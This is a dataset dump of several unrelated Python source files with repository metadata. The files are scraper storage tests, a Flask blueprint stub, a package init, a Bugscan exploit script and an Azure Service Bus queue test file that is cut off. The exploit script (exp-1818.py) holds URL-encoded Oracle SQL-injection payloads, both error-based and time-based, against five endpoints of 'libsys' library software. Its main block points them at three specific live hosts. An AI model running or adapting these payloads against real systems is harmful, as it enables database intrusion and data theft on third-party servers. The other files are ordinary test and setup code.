| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73fe8a2768e93ec07db2c5fcda15c6b8e904828f
| 8,104
|
py
|
Python
|
tests/test_storages.py
|
itcrab/dark-keeper
|
7a263b210ec01f712c9173f65871193ac2190c31
|
[
"MIT"
] | 2
|
2016-10-21T06:57:26.000Z
|
2016-10-22T20:44:25.000Z
|
tests/test_storages.py
|
itcrab/dark_keeper
|
7a263b210ec01f712c9173f65871193ac2190c31
|
[
"MIT"
] | 8
|
2017-12-01T05:31:55.000Z
|
2021-03-20T13:04:05.000Z
|
tests/test_storages.py
|
itcrab/dark_keeper
|
7a263b210ec01f712c9173f65871193ac2190c31
|
[
"MIT"
] | 1
|
2021-05-07T16:37:57.000Z
|
2021-05-07T16:37:57.000Z
|
import pytest
from dark_keeper.storages import UrlsStorage, DataStorage
class TestUrlsStorage:
def test_urls_storage(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
assert urls_storage == ['http://podcast-site.com/']
def test_urls_storage_no_base_url(self):
with pytest.raises(TypeError) as e:
UrlsStorage()
assert str(e.value) == '__init__() missing 1 required positional argument: \'base_url\''
def test_urls_storage_write_new_urls(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
new_urls = [
'http://podcast-site.com/page/1',
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/3',
]
urls_storage.write(new_urls)
assert urls_storage == [
'http://podcast-site.com/',
'http://podcast-site.com/page/1',
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/3',
]
def test_urls_storage_write_new_urls_blank(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
new_urls = []
urls_storage.write(new_urls)
assert urls_storage == ['http://podcast-site.com/']
def test_urls_storage_write_new_urls_blank_value(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
new_urls = ['', None]
urls_storage.write(new_urls)
assert urls_storage == ['http://podcast-site.com/']
def test_urls_storage_write_new_urls_duplicated_base_url(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
new_urls = [
'http://podcast-site.com/page/1',
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/3',
'http://podcast-site.com/',
]
urls_storage.write(new_urls)
assert urls_storage == [
'http://podcast-site.com/',
'http://podcast-site.com/page/1',
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/3',
]
def test_urls_storage_write_new_urls_duplicated(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
new_urls = [
'http://podcast-site.com/page/1',
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/3',
'http://podcast-site.com/page/3',
'http://podcast-site.com/page/3',
]
urls_storage.write(new_urls)
assert urls_storage == [
'http://podcast-site.com/',
'http://podcast-site.com/page/1',
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/3',
]
def test_urls_storage_write_new_urls_twice(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
new_urls = [
'http://podcast-site.com/page/1',
]
urls_storage.write(new_urls)
assert urls_storage == [
'http://podcast-site.com/',
'http://podcast-site.com/page/1',
]
new_urls = [
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/3',
]
urls_storage.write(new_urls)
assert urls_storage == [
'http://podcast-site.com/',
'http://podcast-site.com/page/1',
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/3',
]
def test_urls_storage_write_new_urls_twice_duplicated(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
new_urls = [
'http://podcast-site.com/page/1',
]
urls_storage.write(new_urls)
assert urls_storage == [
'http://podcast-site.com/',
'http://podcast-site.com/page/1',
]
new_urls = [
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/3',
'http://podcast-site.com/page/3',
'http://podcast-site.com/page/3',
]
urls_storage.write(new_urls)
assert urls_storage == [
'http://podcast-site.com/',
'http://podcast-site.com/page/1',
'http://podcast-site.com/page/2',
'http://podcast-site.com/page/3',
]
def test_urls_storage_validation_blank_url(self):
base_url = ''
urls_storage = UrlsStorage(base_url)
assert urls_storage == []
def test_urls_storage_validation_wrong_url(self):
for base_url in ['wrong url', '123 456 789', 'test url for validation']:
urls_storage = UrlsStorage(base_url)
assert urls_storage == []
def test_urls_storage_validation_only_domain(self):
base_url = 'wrong-url.ru'
urls_storage = UrlsStorage(base_url)
assert urls_storage == []
def test_urls_storage_write_validation_blank_url(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
urls_storage.write('')
assert urls_storage == ['http://podcast-site.com/']
def test_urls_storage_write_validation_wrong_url(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
for url in ['wrong url', '123 456 789', 'test url for validation']:
urls_storage.write(url)
assert urls_storage == ['http://podcast-site.com/']
def test_urls_storage_write_validation_only_domain(self):
base_url = 'http://podcast-site.com/'
urls_storage = UrlsStorage(base_url)
urls_storage.write('wrong-url.ru')
assert urls_storage == ['http://podcast-site.com/']
class TestDataStorage:
def test_data_storage(self):
data = dict(title='title 1', desc='desc 1', mp3='podcast_1.mp3')
data_storage = DataStorage()
data_storage.write(data)
assert data_storage == [dict(title='title 1', desc='desc 1', mp3='podcast_1.mp3')]
def test_data_storage_value_list(self):
data = [
dict(title='title 1', desc='desc 1', mp3='podcast_1.mp3'),
dict(title='title 2', desc='desc 2', mp3='podcast_2.mp3'),
]
data_storage = DataStorage()
data_storage.write(data)
assert data_storage == [
dict(title='title 1', desc='desc 1', mp3='podcast_1.mp3'),
dict(title='title 2', desc='desc 2', mp3='podcast_2.mp3'),
]
def test_data_storage_value_list_blank_value(self):
data = [
dict(title='title 1', desc='desc 1', mp3='podcast_1.mp3'),
dict(),
dict(title='title 2', desc='desc 2', mp3='podcast_2.mp3'),
]
data_storage = DataStorage()
data_storage.write(data)
assert data_storage == [
dict(title='title 1', desc='desc 1', mp3='podcast_1.mp3'),
dict(title='title 2', desc='desc 2', mp3='podcast_2.mp3'),
]
data_storage.write([None, dict(), None])
assert data_storage == [
dict(title='title 1', desc='desc 1', mp3='podcast_1.mp3'),
dict(title='title 2', desc='desc 2', mp3='podcast_2.mp3'),
]
def test_data_storage_blank_value(self):
data_storage = DataStorage()
data_storage.write(dict())
assert data_storage == []
data_storage.write(None)
assert data_storage == []
def test_data_storage_blank_value_list(self):
data_storage = DataStorage()
data_storage.write([dict(), dict(), dict()])
assert data_storage == []
data_storage.write([None, dict(), None])
assert data_storage == []
def test_data_storage_blank(self):
data_storage = DataStorage()
assert data_storage == []
| 35.234783
| 96
| 0.581565
| 1,000
| 8,104
| 4.475
| 0.062
| 0.15486
| 0.211173
| 0.253408
| 0.915978
| 0.915978
| 0.894749
| 0.872179
| 0.835084
| 0.806257
| 0
| 0.019841
| 0.272335
| 8,104
| 229
| 97
| 35.388646
| 0.73902
| 0
| 0
| 0.683673
| 0
| 0
| 0.273198
| 0
| 0
| 0
| 0
| 0
| 0.132653
| 1
| 0.107143
| false
| 0
| 0.010204
| 0
| 0.127551
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fb5188810d4efdc4565762f089a992f14495f31e
| 166
|
py
|
Python
|
src/visualization/dashboard/server/auth/__init__.py
|
ClaasM/streamed-sentiment-topic-intent
|
76f6e8686ab629391fd714228547ed1de097466c
|
[
"MIT"
] | null | null | null |
src/visualization/dashboard/server/auth/__init__.py
|
ClaasM/streamed-sentiment-topic-intent
|
76f6e8686ab629391fd714228547ed1de097466c
|
[
"MIT"
] | 8
|
2020-03-24T15:33:52.000Z
|
2022-03-11T23:16:16.000Z
|
src/visualization/dashboard/server/auth/__init__.py
|
ClaasM/streamed-sentiment-topic-intent
|
76f6e8686ab629391fd714228547ed1de097466c
|
[
"MIT"
] | null | null | null |
from server.auth.twitter import twitter_blueprint
url_prefix = '/auth'
def register_all(app):
app.register_blueprint(twitter_blueprint, url_prefix=url_prefix)
| 20.75
| 68
| 0.807229
| 23
| 166
| 5.521739
| 0.521739
| 0.212598
| 0.299213
| 0.393701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108434
| 166
| 7
| 69
| 23.714286
| 0.858108
| 0
| 0
| 0
| 0
| 0
| 0.03012
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
fb64b937ea53158125003f3aa47206fe80213a0c
| 69
|
py
|
Python
|
agents/__init__.py
|
empyriumz/QAS_RL
|
1f44f46acd9e61a8ed501cc7f0462c7217f46316
|
[
"MIT"
] | 5
|
2022-01-12T12:04:18.000Z
|
2022-03-03T19:33:15.000Z
|
agents/__init__.py
|
empyriumz/QAS_RL
|
1f44f46acd9e61a8ed501cc7f0462c7217f46316
|
[
"MIT"
] | null | null | null |
agents/__init__.py
|
empyriumz/QAS_RL
|
1f44f46acd9e61a8ed501cc7f0462c7217f46316
|
[
"MIT"
] | 2
|
2022-01-14T05:30:44.000Z
|
2022-03-03T19:37:27.000Z
|
from . import DeepQ
from . import DeepQ_PER
from . import DeepQNstep
| 17.25
| 24
| 0.782609
| 10
| 69
| 5.3
| 0.5
| 0.566038
| 0.566038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 69
| 3
| 25
| 23
| 0.929825
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fbe10ea6bf93c066d857650d0393a3dadd202d54
| 4,039
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-1818.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-1818.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-1818.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2015-0135648
import time
def assign(service, arg):
if service == "libsys":
return True, arg
def audit(arg):
payloads = {
'opac/cls_browsing_book.php?cls=-1':'%27%29%20OR%207352%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287352%3D7352%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%271%27%20LIKE%20%271',
'asord/asord_searchresult.php?q=88952634&type=02':'%27%29%20AND%201055%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287352%3D7352%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27Ofjo%27%3D%27Ofjo',
'opac/search_rss.php?callno=I313.45&doctype=ALL&lang_code=ALL&match_flag=forward&displaypg=20&showmode=list&orderby=DESC&use_flag=3&sort=CATA_DATE&onlylendable=yes&location=-8641':'%20OR%202714%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287352%3D7352%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29',
'opac/peri_nav_cls_peri.php?classid=%00':'%27%20AND%203321%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287352%3D7352%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27fKMS%27%3D%27fKMS',
'opac/sci_browsing_book.php?cls=-6835':'%27%29%20OR%205155%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28107%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287352%3D7352%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28106%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27zcdX%27%20LIKE%20%27zcdX',
}
for payload in payloads:
code, head, res, err, _ = curl.curl2(arg+payload+payloads[payload])
if code ==200 and 'qzkvq1qkjvq' in res:
security_hole(arg+payload+" :sql Injection")
else:
getdata1 = '%25%27%20AND%207394%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2884%29%7C%7CCHR%2875%29%7C%7CCHR%28100%29%7C%7CCHR%2885%29%2C5%29%20AND%20%27%25%27%3D%27'
getdata2 = '%25%27%20AND%207394%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2884%29%7C%7CCHR%2875%29%7C%7CCHR%28100%29%7C%7CCHR%2885%29%2C0%29%20AND%20%27%25%27%3D%27'
t1 = time.time()
code, head, res, errcode, _ = curl.curl2(arg+payload+getdata1)
t2 = time.time()
code, head, res, errcode, _ = curl.curl2(arg+payload+getdata2)
t3 = time.time()
if code == 200 and (2*t2 - t1 - t3 > 3):
security_hole(arg + payload + " :sql Injection")
if __name__ == '__main__':
from dummy import *
audit(assign('libsys', 'http://202.119.108.28/')[1])
audit(assign('libsys', 'http://221.226.44.228/')[1])
audit(assign('libsys', 'http://lib1.sdx.js.cn:88/')[1])
| 85.93617
| 585
| 0.694726
| 706
| 4,039
| 3.932011
| 0.233711
| 0.102305
| 0.213977
| 0.100865
| 0.707493
| 0.691643
| 0.667147
| 0.667147
| 0.653458
| 0.653458
| 0
| 0.338845
| 0.116613
| 4,039
| 47
| 586
| 85.93617
| 0.439182
| 0.025501
| 0
| 0.064516
| 0
| 0.258065
| 0.74196
| 0.704914
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.064516
| 0
| 0.16129
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83755a142398f78cfe48bef3a7e3420890b031bc
| 39,386
|
py
|
Python
|
sdk/servicebus/azure-servicebus/tests/test_queues.py
|
tzhanl/azure-sdk-for-python
|
18cd03f4ab8fd76cc0498f03e80fbc99f217c96e
|
[
"MIT"
] | 1
|
2021-06-02T08:01:35.000Z
|
2021-06-02T08:01:35.000Z
|
sdk/servicebus/azure-servicebus/tests/test_queues.py
|
tzhanl/azure-sdk-for-python
|
18cd03f4ab8fd76cc0498f03e80fbc99f217c96e
|
[
"MIT"
] | 1
|
2019-06-04T18:12:16.000Z
|
2019-06-04T18:12:16.000Z
|
sdk/servicebus/azure-servicebus/tests/test_queues.py
|
tzhanl/azure-sdk-for-python
|
18cd03f4ab8fd76cc0498f03e80fbc99f217c96e
|
[
"MIT"
] | 1
|
2019-06-17T22:18:23.000Z
|
2019-06-17T22:18:23.000Z
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import logging
import sys
import os
import pytest
import time
from datetime import datetime, timedelta
from azure.servicebus import ServiceBusClient, QueueClient, AutoLockRenew
from azure.servicebus.common.message import Message, PeekMessage, BatchMessage, DeferredMessage
from azure.servicebus.common.constants import ReceiveSettleMode
from azure.servicebus.common.errors import (
ServiceBusError,
MessageLockExpired,
InvalidHandlerState,
MessageAlreadySettled,
AutoLockRenewTimeout,
MessageSendFailed,
MessageSettleFailed)
def get_logger(level):
azure_logger = logging.getLogger("azure")
if not azure_logger.handlers:
azure_logger.setLevel(level)
handler = logging.StreamHandler(stream=sys.stdout)
handler.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))
azure_logger.addHandler(handler)
uamqp_logger = logging.getLogger("uamqp")
if not uamqp_logger.handlers:
uamqp_logger.setLevel(logging.INFO)
uamqp_logger.addHandler(handler)
return azure_logger
_logger = get_logger(logging.DEBUG)
def print_message(message):
_logger.info("Receiving: {}".format(message))
_logger.debug("Time to live: {}".format(message.time_to_live))
_logger.debug("Sequence number: {}".format(message.sequence_number))
_logger.debug("Enqueue Sequence numger: {}".format(message.enqueue_sequence_number))
_logger.debug("Partition ID: {}".format(message.partition_id))
_logger.debug("Partition Key: {}".format(message.partition_key))
_logger.debug("User Properties: {}".format(message.user_properties))
_logger.debug("Annotations: {}".format(message.annotations))
_logger.debug("Delivery count: {}".format(message.header.delivery_count))
try:
_logger.debug("Locked until: {}".format(message.locked_until))
_logger.debug("Lock Token: {}".format(message.lock_token))
except TypeError:
pass
_logger.debug("Enqueued time: {}".format(message.enqueued_time))
@pytest.mark.liveTest
def test_queue_by_queue_client_conn_str_receive_handler_peeklock(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Handler message no. {}".format(i))
message.enqueue_sequence_number = i
sender.send(message)
receiver = queue_client.get_receiver(idle_timeout=5)
count = 0
for message in receiver:
print_message(message)
count += 1
message.complete()
assert count == 10
@pytest.mark.liveTest
def test_queue_by_queue_client_conn_str_receive_handler_receiveanddelete(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Handler message no. {}".format(i))
message.enqueue_sequence_number = i
sender.send(message)
messages = []
receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
for message in receiver:
messages.append(message)
with pytest.raises(MessageAlreadySettled):
message.complete()
assert not receiver.running
assert len(messages) == 10
time.sleep(30)
messages = []
receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
for message in receiver:
messages.append(message)
assert len(messages) == 0
@pytest.mark.liveTest
def test_queue_by_queue_client_conn_str_receive_handler_with_stop(live_servicebus_config, standard_queue):
queue_client = QueueClient.from_connection_string(
live_servicebus_config['conn_str'],
name=standard_queue,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Stop message no. {}".format(i))
sender.send(message)
messages = []
receiver = queue_client.get_receiver(idle_timeout=5)
for message in receiver:
messages.append(message)
message.complete()
if len(messages) >= 5:
break
assert receiver.running
assert len(messages) == 5
with receiver:
for message in receiver:
messages.append(message)
message.complete()
if len(messages) >= 5:
break
assert not receiver.running
assert len(messages) == 6
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_simple(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Iter message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
print_message(message)
message.complete()
with pytest.raises(MessageAlreadySettled):
message.complete()
with pytest.raises(MessageAlreadySettled):
message.renew_lock()
count += 1
with pytest.raises(InvalidHandlerState):
next(receiver)
assert count == 10
@pytest.mark.liveTest
def test_queue_by_servicebus_conn_str_client_iter_messages_with_abandon(live_servicebus_config, standard_queue):
client = ServiceBusClient.from_connection_string(live_servicebus_config['conn_str'], debug=False)
queue_client = client.get_queue(standard_queue)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Abandoned message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
print_message(message)
if not message.header.delivery_count:
count += 1
message.abandon()
else:
assert message.header.delivery_count == 1
message.complete()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_defer(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Deferred message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_client(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Deferred message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
deferred = queue_client.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.PeekLock)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
with pytest.raises(ValueError):
message.complete()
with pytest.raises(ValueError):
queue_client.settle_deferred_messages('foo', deferred)
queue_client.settle_deferred_messages('completed', deferred)
with pytest.raises(ServiceBusError):
queue_client.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_complete(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = queue_client.send(messages, session="test_session")
assert all(result[0] for result in results)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
deferred = receiver.receive_deferred_messages(deferred_messages)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
assert message.lock_token
assert message.locked_until
assert message._receiver
message.renew_lock()
message.complete()
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deadletter(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = queue_client.send(messages)
assert all(result[0] for result in results)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5) as session:
deferred = session.receive_deferred_messages(deferred_messages)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
message.dead_letter("something")
count = 0
with queue_client.get_deadletter_receiver(idle_timeout=5) as receiver:
for message in receiver:
count += 1
print_message(message)
assert message.user_properties[b'DeadLetterReason'] == b'something'
assert message.user_properties[b'DeadLetterErrorDescription'] == b'something'
message.complete()
assert count == 10
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deletemode(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = queue_client.send(messages)
assert all(result[0] for result in results)
count = 0
receiver = queue_client.get_receiver(idle_timeout=5)
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5) as receiver:
deferred = receiver.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.ReceiveAndDelete)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
with pytest.raises(MessageAlreadySettled):
message.complete()
with pytest.raises(ServiceBusError):
deferred = receiver.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_not_found(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
deferred_messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(3):
message = Message("Deferred message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 3
with pytest.raises(ServiceBusError):
deferred = queue_client.receive_deferred_messages([3, 4], mode=ReceiveSettleMode.PeekLock)
with pytest.raises(ServiceBusError):
deferred = queue_client.receive_deferred_messages([5, 6, 7], mode=ReceiveSettleMode.PeekLock)
@pytest.mark.liveTest
def test_queue_by_servicebus_client_receive_batch_with_deadletter(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=False)
queue_client = client.get_queue(standard_queue)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Dead lettered message no. {}".format(i))
sender.send(message)
count = 0
